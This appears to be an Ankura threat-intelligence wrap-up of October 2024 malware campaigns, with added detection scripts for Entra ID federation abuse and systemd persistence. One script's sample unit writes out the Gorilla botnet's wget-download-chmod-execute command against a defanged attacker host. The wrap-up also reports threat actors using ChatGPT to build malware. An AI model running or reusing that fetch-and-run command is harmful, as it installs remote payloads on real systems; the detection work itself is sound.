ARTICLE
11 November 2024

Cyber Threat Investigations & Expert Services (CTIX) FLASH Wrap-Up - October 2024

Ankura Consulting Group LLC


Ankura Consulting Group, LLC is an independent global expert services and advisory firm that delivers end-to-end solutions to help clients at critical inflection points related to conflict, crisis, performance, risk, strategy, and transformation. Ankura consists of more than 1,800 professionals and has served 3,000+ clients across 55 countries. Collaborative lateral thinking, hard-earned experience, and multidisciplinary capabilities drive results and Ankura is unrivalled in its ability to assist clients to Protect, Create, and Recover Value. For more information, please visit, ankura.com.

Executive Summary

The Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Wrap-Up is a collection of high-level cyber intelligence summaries pertaining to current or emerging cyber events in September 2024, originally published in CTIX FLASH Updates throughout September. This publication includes malware threats, threat actor activity, and newly identified vulnerabilities impacting a wide range of industries and victims. The CTIX FLASH Update is a semi-weekly newsletter that provides a timely snapshot of cyber events, geared toward cyber professionals and end users with varying levels of technical knowledge. The events published in the FLASH typically occurred close in time to publication of the report.

To stay up to date on the latest cyber threat activity, sign up for our weekly newsletter: the Ankura CTIX FLASH Update.

MALWARE ACTIVITY

Storm-0501 Releases Embargo Ransomware in Cloud Environments

Reported in the October 1st, 2024, FLASH Update

  • Researchers at Microsoft have recently warned that threat actor Storm-0501 is now targeting and deploying ransomware in hybrid cloud environments in addition to on-premise environments. Storm-0501 is a ransomware threat actor that has been active since 2021 and has been known to utilize a variety of ransomware strains in their attacks including Hive, BlackCat, LockBit, and Embargo. Embargo ransomware is a Rust-based variety and is provided to threat groups under a ransomware-as-a-service (RaaS) model. Storm-0501 has targeted healthcare, government, transportation, law enforcement, and manufacturing industries in the United States. In recent attack campaigns, the group has expanded their infiltration operations to compromise hybrid cloud environments, exfiltrating data and encrypting systems to demand ransom from victims. Storm-0501 initially gains access to victim organizations either through compromised credentials or exploitation of known vulnerabilities. Once a privileged account in Microsoft's Entra ID (formerly Azure AD) is compromised, Storm-0501 establishes persistence by creating a new federated domain within the Microsoft Entra tenant. This is also a well-known tactic of the notorious Scattered Spider or "Octo Tempest" threat actor group. After victim data is exfiltrated, the Embargo ransomware payload is deployed using scheduled tasks or Group Policy Objects (GPOs) to encrypt files across devices. Compromising a federated identity access manager to gain access and establish persistence in cloud environments is becoming a more popular tactic amongst threat actors. In Entra ID environments, it is particularly important that organizations monitor authentication and activity of Microsoft Entra Connect Sync accounts, which are used to synchronize data between on-premises Active Directory and Entra ID. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
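The two monitoring points the item above calls out, a new federated domain appearing in the tenant and an Entra Connect Sync account authenticating from somewhere it has not before, can be checked against exported Entra ID logs. The script below is an added example written for this wrap-up; it is not Ankura's or Microsoft's code. The log records are constructed samples that loosely follow the Entra audit and sign-in log schema (the field names activityDisplayName, initiatedBy, targetResources, userPrincipalName, ipAddress, createdDateTime are assumed), "Set domain authentication" and "Set federation settings on domain" are real Entra audit operation names but the list should be extended against your own tenant's logs, and the Sync_ account-name prefix is the naming convention Entra Connect uses for the accounts it creates.

```python
"""Triage Entra ID log exports for federation changes and for Entra Connect
Sync accounts signing in from previously unseen IP addresses.
Added example; constructed sample data; not Ankura's or Microsoft's code."""
import json
from datetime import datetime, timedelta

# Audit-log operation names that add or re-point domain federation.
# The first two are real Entra audit operation names; treat the set as an
# assumption to be extended from your own tenant's audit logs.
FEDERATION_ACTIVITIES = {
    "Set domain authentication",
    "Set federation settings on domain",
    "Add unverified domain",
}
# Entra Connect creates its sync account as Sync_<server>_<hex>@<tenant>.
SYNC_ACCOUNT_PREFIX = "sync_"

# Constructed audit records: a routine user update, then a new domain being
# added and switched to federated authentication (the Storm-0501 pattern).
AUDIT_LOGS = json.loads("""
[
 {"activityDateTime": "2024-09-20T10:02:11Z", "activityDisplayName": "Update user",
  "initiatedBy": {"user": {"userPrincipalName": "it.admin@example.com"}},
  "targetResources": [{"displayName": "j.doe@example.com"}]},
 {"activityDateTime": "2024-09-21T03:14:55Z", "activityDisplayName": "Add unverified domain",
  "initiatedBy": {"user": {"userPrincipalName": "globaladmin@example.com"}},
  "targetResources": [{"displayName": "rogue-federation.example"}]},
 {"activityDateTime": "2024-09-21T03:16:40Z", "activityDisplayName": "Set domain authentication",
  "initiatedBy": {"user": {"userPrincipalName": "globaladmin@example.com"}},
  "targetResources": [{"displayName": "rogue-federation.example"}]}
]
""")

# Constructed sign-in records: the sync account normally authenticates from
# the on-premises egress IP, then once from an unrelated address.
SIGNIN_LOGS = json.loads("""
[
 {"createdDateTime": "2024-09-01T00:00:00Z", "userPrincipalName": "Sync_ADCONNECT01_1a2b3c@example.onmicrosoft.com", "ipAddress": "203.0.113.10"},
 {"createdDateTime": "2024-09-02T00:00:00Z", "userPrincipalName": "Sync_ADCONNECT01_1a2b3c@example.onmicrosoft.com", "ipAddress": "203.0.113.10"},
 {"createdDateTime": "2024-09-21T03:10:00Z", "userPrincipalName": "Sync_ADCONNECT01_1a2b3c@example.onmicrosoft.com", "ipAddress": "198.51.100.77"},
 {"createdDateTime": "2024-09-21T03:11:00Z", "userPrincipalName": "j.doe@example.com", "ipAddress": "198.51.100.77"}
]
""")


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def federation_changes(audit_logs):
    """Return (time, actor, domain, operation) for every federation-related audit event."""
    hits = []
    for rec in audit_logs:
        if rec.get("activityDisplayName") not in FEDERATION_ACTIVITIES:
            continue
        actor = rec.get("initiatedBy", {}).get("user", {}).get("userPrincipalName", "?")
        targets = [t.get("displayName", "?") for t in rec.get("targetResources", [])]
        hits.append((rec["activityDateTime"], actor, targets[0] if targets else "?",
                     rec["activityDisplayName"]))
    return hits


def sync_account_anomalies(signin_logs, baseline=timedelta(days=14)):
    """Flag sign-ins by Sync_ accounts from IPs not seen during each account's baseline window.

    The baseline is the set of IPs observed within `baseline` of the account's
    first sign-in in the export; anything later from a new IP is reported."""
    by_user = {}
    for rec in sorted(signin_logs, key=lambda r: r["createdDateTime"]):
        upn = rec["userPrincipalName"]
        if upn.lower().startswith(SYNC_ACCOUNT_PREFIX):
            by_user.setdefault(upn, []).append(rec)
    anomalies = []
    for upn, recs in by_user.items():
        start = _ts(recs[0]["createdDateTime"])
        known = {r["ipAddress"] for r in recs if _ts(r["createdDateTime"]) - start <= baseline}
        for r in recs:
            if _ts(r["createdDateTime"]) - start > baseline and r["ipAddress"] not in known:
                anomalies.append((r["createdDateTime"], upn, r["ipAddress"]))
    return anomalies


if __name__ == "__main__":
    for hit in federation_changes(AUDIT_LOGS):
        print("FEDERATION CHANGE:", *hit)
    for anomaly in sync_account_anomalies(SIGNIN_LOGS):
        print("SYNC ACCOUNT FROM NEW IP:", *anomaly)
```

On a real export the baseline window should be long enough to cover every legitimate Entra Connect server (and any failover host), and the federation hits should be reconciled against change tickets: any "Set domain authentication" event nobody can account for is worth treating as an incident rather than a configuration drift.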

Nefarious Job Applicants Trick HR Professionals into Downloading More_eggs Malware

Reported in the October 4th, 2024, FLASH Update

  • Researchers at Trend Micro have recently reported on a malware campaign targeting HR professionals with the "more_eggs" malware. More_eggs is a backdoor sold as Malware-as-a-Service (MaaS) attributed to the Golden Chickens (aka Venom Spider) threat group. More_eggs is capable of stealing credentials, delivering additional payloads, and establishing command-and-control (C2) with the attacker. Researchers at eSentire also reported on a similar campaign in June 2024 that delivered more_eggs malware to recruiters via fake job applications. Given that more_eggs is available for purchase by cybercriminals, multiple different groups could be behind these recent campaigns. The attack reported by Trend Micro begins with a spear-phishing email to a recruiter from a fake job-seeker purportedly interested in an inside sales engineer role. The email led the recruiter to click on a URL named after the bogus candidate, which opened a professional-looking personal website with another link to "Download CV". The download includes a LNK file and a JPEG file. The LNK file contains obfuscated commands which in turn execute a malicious DLL that drops the more_eggs malware onto the victim device. Submissions of similar LNK files to VirusTotal suggest that this is an ongoing campaign with two variations. The first variation includes LNK files typically named after a screenshot or document, uses string substitution for obfuscation, and includes additional PowerShell or Visual Basic scripts in the attack chain. The second variation includes LNK files typically named after a person, utilizes variable substitution for obfuscation, and does not use additional scripts in the infection chain. CTIX analysts recommend that recruiters use caution when downloading files from personal websites and consider compressed files or files with unexpected extensions to be particularly suspicious. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

New Gorilla Botnet Issues Over 300,000 DDoS Attacks

Reported in the October 8th, 2024, FLASH Update

  • Cybersecurity researchers have identified a new botnet family called "Gorilla Botnet" that has been particularly active through the month of September. The botnet issued over 300,000 attack commands targeting over 100 countries, although most of the attacks were directed at the U.S., China, Canada, and Germany. Targets allegedly included universities, governments, telecommunications companies, banks, and the gaming industry. Researchers determined that the botnet relied heavily on UDP floods as its preferred method of attack, followed by ACK Bypass Flood and VSE Flood methods. The botnet can carry out many different types of attacks and uses encryption algorithms similar to those employed by the Keksec group to hide key information, suggesting that the attackers behind this campaign could be related to Keksec. Examination of Gorilla Botnet's source code indicates that it appears to be a variant of the leaked Mirai botnet. The botnet infection supports multiple CPU architectures, connects with one of five predefined command-and-control (C2) servers, and embeds functions to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution. The botnet maintains persistence by creating a service file named "custom.service" within the "/etc/systemd/system/" directory which is configured to run automatically at system startup. This service downloads a shell script "lol.sh" from the remote server "pen[.]gorillafirewall[.]su" to the "/tmp/" directory, sets execution permissions, and executes the script. Denial-of-service attacks continue to be one of the most prevalent cybersecurity threats. CTIX analysts recommend that organizations implement controls to mitigate the risk posed by DoS attacks. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
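The persistence mechanism described above (a unit in /etc/systemd/system/ that fetches a script into /tmp/, marks it executable and runs it at boot) is easy to audit for on a Linux host, because every one of those steps has to appear on the unit's Exec lines. The script below is an added example written for this wrap-up, not Ankura's code or anything from the botnet's own tooling. Its two unit texts are constructed samples: the first mirrors the behaviour in the write-up using the file name and the defanged host name quoted there, the second is an ordinary nginx unit. The downloader names, temp-directory list and scoring rules are heuristics chosen here, not a published signature.

```python
"""Audit systemd unit files for the drop-and-run persistence pattern:
fetch from a remote host into a world-writable directory, chmod, execute.
Added example; constructed sample units; not Ankura's code."""
import re
import shlex
from pathlib import Path

# Heuristic lists (assumptions, extend to taste).
DOWNLOADERS = {"curl", "wget", "ftpget", "tftp", "busybox"}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
EXEC_KEY_RE = re.compile(r"^\s*(ExecStart(?:Pre|Post)?|ExecReload)\s*=\s*(.*)$")
SEPARATORS_RE = re.compile(r"\s*(?:;|&&|\|\||\||&)\s*")

# Constructed samples. The first reproduces the write-up's behaviour with the
# quoted file name and the defanged host; the second is a normal service.
SAMPLE_UNITS = {
    "custom.service": """[Unit]
Description=custom
After=network.target

[Service]
Type=oneshot
ExecStart=/bin/sh -c 'wget pen[.]gorillafirewall[.]su/lol.sh -O /tmp/lol.sh; chmod +x /tmp/lol.sh; /tmp/lol.sh'

[Install]
WantedBy=multi-user.target
""",
    "nginx.service": """[Unit]
Description=nginx

[Service]
ExecStart=/usr/sbin/nginx -g 'daemon off;'
ExecReload=/usr/sbin/nginx -s reload

[Install]
WantedBy=multi-user.target
""",
}


def exec_commands(unit_text):
    """Yield (key, command) for every Exec* line, honouring backslash line continuation."""
    for line in unit_text.replace("\\\n", " ").splitlines():
        m = EXEC_KEY_RE.match(line)
        if m:
            yield m.group(1), m.group(2).strip()


def _subcommands(command):
    """Split an Exec line, and any quoted 'sh -c' payload inside it, into argv lists."""
    subs = []
    for token in shlex.split(command):
        for segment in SEPARATORS_RE.split(token):
            argv = segment.split()
            if argv:
                subs.append(argv)
    return subs


def suspicious_reasons(command):
    """Return the list of reasons a command line matches the drop-and-run pattern (empty if none)."""
    subs = _subcommands(command)
    reasons = []
    downloaders = sorted({Path(a[0]).name for a in subs if Path(a[0]).name in DOWNLOADERS})
    if downloaders:
        reasons.append("fetches remote content with " + ", ".join(downloaders))
    temp_paths = sorted({w for a in subs for w in a if w.startswith(WORLD_WRITABLE)})
    if temp_paths:
        reasons.append("references world-writable path(s) " + ", ".join(temp_paths))
    if any(Path(a[0]).name == "chmod" and any(w.startswith(WORLD_WRITABLE) for w in a) for a in subs):
        reasons.append("makes a file in a temp directory executable")
    if any(a[0].startswith(WORLD_WRITABLE) for a in subs):
        reasons.append("executes a file from a temp directory")
    return reasons


def audit_units(units):
    """units: {unit name: unit text}. Returns {name: [(key, command, reasons)]} for flagged units only."""
    findings = {}
    for name, text in units.items():
        for key, cmd in exec_commands(text):
            reasons = suspicious_reasons(cmd)
            if reasons:
                findings.setdefault(name, []).append((key, cmd, reasons))
    return findings


def load_units(directory="/etc/systemd/system"):
    """Read every *.service in a directory (the location the write-up names) for audit_units()."""
    return {p.name: p.read_text(errors="replace") for p in Path(directory).glob("*.service")}


if __name__ == "__main__":
    for name, hits in audit_units(SAMPLE_UNITS).items():
        for key, cmd, reasons in hits:
            print(f"{name}: {key}={cmd}")
            for reason in reasons:
                print("   -", reason)
```

Run it against `load_units()` on a live host (and, to be thorough, against the user-level unit directories and /run/systemd/system, which this example does not enumerate). A single reason is weak evidence on its own, since plenty of legitimate units write to /tmp; the combination of all four on one oneshot unit is what makes the Gorilla pattern stand out.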

SilentCryptoMiner Infects Over 28,000 Systems

Reported in the October 11th, 2024, FLASH Update

  • SilentCryptoMiner, a malware designed to hijack system resources for cryptocurrency mining, has been downloaded on over 28,000 systems in Russia, Turkey, and Ukraine. The campaign behind these infections promotes the malware as legitimate software on YouTube and in GitHub repositories, and hides it in game cheat codes, trading bots, and pirated office-related software. The fake software downloads are contained in a password-protected ZIP file, which when opened drops obfuscated scripts, DLL files, and an AutoIT interpreter that launches the main payload. As with most modern malware, the malicious download checks for the presence of debugging tools prior to proceeding. The malware hijacks legitimate Windows system services and browser update processes to ensure it is executed upon launch of those processes. The Ncat network utility is used for command-and-control (C2) communications. There are two (2) main payloads of the infection. The first is "DeviceId.dll", which executes the SilentCryptoMiner malware to mine cryptocurrency using victim machine resources. The second is "7zxa.dll", which monitors the Windows clipboard for patterns resembling a cryptocurrency wallet address and replaces the string with a different wallet address under the attacker's control. Researchers have noted that this clipper functionality has stolen at least $6,000 worth of transactions by diverting victim funds to the attackers' wallets. CTIX analysts recommend that organizations and individuals do not download software from unvetted sources or websites. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

OpenAI Reports on Threat Actors using ChatGPT to Advance Cyber Attacks

Reported in the October 15th, 2024, FLASH Update

  • OpenAI recently released an October 2024 report, "Influence and cyber operations: an update", which the company releases as a form of transparency reporting regarding their efforts to identify, prevent, and disrupt attempts to abuse their models for harmful ends. The report states that OpenAI has disrupted more than twenty (20) operations and deceptive networks from around the world maliciously using their Large Language Model (LLM) – ChatGPT – since May 2024. While cybersecurity experts identified campaigns that were assessed to have leveraged Generative AI in the creation of malware earlier this year, this report from OpenAI is the first official confirmation of the practice. Activities outlined in the report include those performed by threat actors "SweetSpecter", "CyberAv3ngers", and "Storm-0817". SweetSpecter is linked to China, and OpenAI was directly targeted by spear-phishing emails containing the SugarGhost RAT sent to the personal email addresses of employees. OpenAI discovered that SweetSpecter used ChatGPT to perform scripting and vulnerability analysis research, asking questions about specific CVE numbers, using sqlmap to upload web shells, and debugging code. CyberAv3ngers is a threat actor allegedly associated with the Iranian government and reportedly used ChatGPT to build false credentials in Programmable Logic Controllers (PLCs), develop bash and Python scripts, and obfuscate code. Storm-0817 is also associated with Iran, and OpenAI reports that the group used ChatGPT to create an Instagram scraper and write and debug custom Android-based malware. OpenAI banned the accounts tied to the malicious activity and threat actors after discovery. CTIX analysts expect the misuse of Generative AI for the advancement of cybersecurity attacks to only become more prevalent. CTIX analysts will continue to report on new and emerging malware and associated campaigns.

Internet Explorer Zero-Day Leads to Zero-Click RokRAT Infections

Reported in the October 18th, 2024, FLASH Update

  • Threat Actor "ScarCruft" (AKA "APT37" or "RedEyes") has allegedly exploited an Internet Explorer zero-day flaw to host zero-click malware on toast advertisements. ScarCruft is a hacking group tied to North Korea and is known for targeting victims in South Korea and Europe with phishing, watering hole, and zero-day attacks. In a large-scale attack in May 2024, ScarCruft exploited a zero-day vulnerability in Internet Explorer to install the RokRAT malware on victim systems. RokRAT is designed to exfiltrate data to a Yandex cloud, log keystrokes, monitor for clipboard changes, and capture screenshots every three (3) minutes. ScarCruft has been known to use RokRAT in their attacks over the past few years. Cybersecurity researchers notified Microsoft of the campaign and flaw in August 2024, and although Internet Explorer is out of support, Microsoft released a security update to address the vulnerability tracked as CVE-2024-38178. ScarCruft carried out their campaign by compromising the server of a domestic advertising agency which served the malicious toast ads within a free software used by many in South Korea. Toast ads are pop-ups embedded in software to display notifications or advertisements. The attacker-crafted advertisements contained a malicious iframe which caused a JavaScript file to trigger remote execution via the flaw in Internet Explorer's "JScript9.dll" file. The malware payloads are injected in the explorer.exe process to evade detection. A payload "rubyq.exe" is dropped into the Windows startup and is scheduled for execution every four (4) minutes. Although Internet Explorer is out of support, it can still be integrated into third-party software, and that software may not have incorporated the latest update to fix this flaw. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

ESET Distributor Breached, Data Wipers Sent to Israeli Organizations

Reported in the October 22nd, 2024, FLASH Update

  • Cybercriminals have allegedly breached Comsecure, an Israeli distributor of ESET's software and cybersecurity products, to send phishing emails to Israeli organizations containing data-wiping malware disguised as cybersecurity software. The phishing campaign began on October 8th, when emails from the legitimate eset[.]co[.]il domain were sent to Israel-based customers from ESET's "Advanced Threat Defense Team". The phishing emails warned that the recipient had recently been targeted by government-backed attackers and offered the recipient a link to download an advanced cybersecurity tool: "ESET Unleashed". The link directs users to the legitimate eset[.]co[.]il domain, which hosts a ZIP archive containing four DLL files digitally signed with ESET's code signing certificate along with an executable, "Setup.exe", that is not signed. "Setup.exe" is the data wiper, designed to delete all the files off of a victim's computer while corrupting the partition table to make data recovery difficult. ESET released a statement on October 18th, 2024, noting that the company was "...aware of a security incident which affected our partner company in Israel last week". ESET's announcement states that a "limited malicious campaign was blocked within ten minutes", and that their customers are secure. As of the time of this writing, the attack has not yet been attributed to a specific threat actor. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
